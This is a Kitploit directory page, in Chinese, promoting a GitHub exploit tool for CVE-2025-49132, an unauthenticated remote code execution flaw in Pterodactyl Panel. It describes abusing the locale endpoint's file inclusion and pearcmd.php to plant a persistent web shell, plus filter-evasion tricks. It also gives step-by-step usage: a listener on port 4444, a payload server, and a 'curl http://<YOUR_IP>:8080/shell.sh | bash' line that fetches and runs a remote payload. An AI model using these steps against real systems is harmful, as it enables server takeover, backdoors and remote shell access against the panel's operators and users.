Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-49132-Mods — CVE-2025-49132的自动化利用工具,Pterodactyl Panel中的一个严重未认证RCE漏洞。通过locale端点利用LFI来部署持久性web shell并实现reverse shell访问。 | Kitploit
工具/GitHubGitHub/malw0re/cve-2025-49132-mods
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubmalw0re/cve-2025-49132-mods

CVE-2025-49132-Mods

CVE-2025-49132的自动化利用工具,Pterodactyl Panel中的一个严重未认证RCE漏洞。通过locale端点利用LFI来部署持久性web shell并实现reverse shell访问。

查看仓库
122496个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-49132 - 简单RCE

Python CVE

📝 概述

本仓库包含针对 CVE-2025-49132 的专用利用工具,这是一个在 Pterodactyl 面板(v1.11.11 之前版本)中存在的严重未认证远程代码执行(RCE)漏洞。

该漏洞存在于 /locales/locale.json 端点。通过操纵 locale 和 namespace 查询参数,攻击者可以利用本地文件包含(LFI)与 pearcmd.php 交互。这允许创建任意文件并执行命令,从而导致系统完全被攻陷。

⚙️ 利用链

ape.py 脚本自动执行以下步骤:

  • PEAR 发现:对目录结构进行模糊测试,以定位目标上的 PEAR 安装。
  • 后门创建:使用 PEAR 的 config-create 功能将持久化网页 shell 写入 /tmp/shell.php。

🚀 使用说明

为了在目标上实现成功的回调,请遵循以下工作流程:

  1. 准备 监听器:在单独的终端启动 Penelope(或您偏好的监听器):

penelope -p 4444

暂存服务器:如果使用自定义 shell 脚本,通过 Python 托管:

python3 -m http.server 8080

  1. 执行 以交互模式运行脚本,以保持对利用过程的控制:

python3 ape.py --host xxx.xxx.xxx --interactive

  1. 获取 Shell 在 shell> 提示符内,使用以下命令执行您的暂存有效负载:

shell> curl http://<YOUR_IP>:8080/shell.sh | bash

🛡️ 技术保障

  • 空格绕过:自动使用 ${IFS} 确保有效负载在 URL 解析中存活。
  • Base64 包装:将反向 shell 命令包装在 Base64 中,以防止目标 Nginx/Web 服务器损坏字符。
  • 超时处理:设计用于检测反向 shell 是否成功连接,即使 Web 请求挂起。
下载工具